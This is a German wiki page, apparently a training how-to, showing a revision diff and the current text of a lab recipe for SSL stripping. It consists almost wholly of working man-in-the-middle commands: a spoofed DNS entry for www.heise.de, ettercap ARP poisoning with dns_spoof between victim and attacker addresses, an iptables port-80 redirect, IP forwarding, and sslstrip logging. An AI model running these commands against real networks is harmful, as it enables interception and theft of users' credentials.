Ssl strip anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(7 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
=Vorbermerkung=
+
=host anlegen=
Da python2 als obsolet gilt muss sslstrip auf einem älteren System laufen.
+
*echo -e "www.heise.de  A 10.0.10.104" > /etc/ettercap/etter.dns
 +
 
 +
==ettercap mit dns plugin starten==
 +
*OPFER=10.0.10.102
 +
*ANGREIFER=10.0.10.101
 +
*ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//
 +
;opfer
  
 
=nat prerouting=
 
=nat prerouting=
*iptables -t nat -A PREROUTING -p tcp --dport 80  -j REDIRECT --to-port 10000
+
*iptables -t nat -I PREROUTING -p tcp --dport 80  -j REDIRECT --to-port 10000
  
 
=forwarding=
 
=forwarding=
 
*echo 1 > /proc/sys/net/ipv4/ip_forward
 
*echo 1 > /proc/sys/net/ipv4/ip_forward
 +
=Install=
 +
*apt-get install sslstrip
 +
 
=sslstrip starten=
 
=sslstrip starten=
 
*sslstrip -a -f -k -w sslstrip.log
 
*sslstrip -a -f -k -w sslstrip.log
 
=arpspoofing=
 
*$HOST1=10.0.10.102
 
*$HOST2=10.0.10.104
 
*ettercap -Tq -i eth0 -M arp /$HOST1,$HOST2// /$HOST2,$HOST1//
 
  
 
=log=
 
=log=
 
*cat sslstrip.log
 
*cat sslstrip.log

Aktuelle Version vom 27. Oktober 2022, 14:03 Uhr

host anlegen

  • echo -e "www.heise.de A 10.0.10.104" > /etc/ettercap/etter.dns

ettercap mit dns plugin starten

  • OPFER=10.0.10.102
  • ANGREIFER=10.0.10.101
  • ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//
opfer

nat prerouting

  • iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

forwarding

  • echo 1 > /proc/sys/net/ipv4/ip_forward

Install

  • apt-get install sslstrip

sslstrip starten

  • sslstrip -a -f -k -w sslstrip.log

log

  • cat sslstrip.log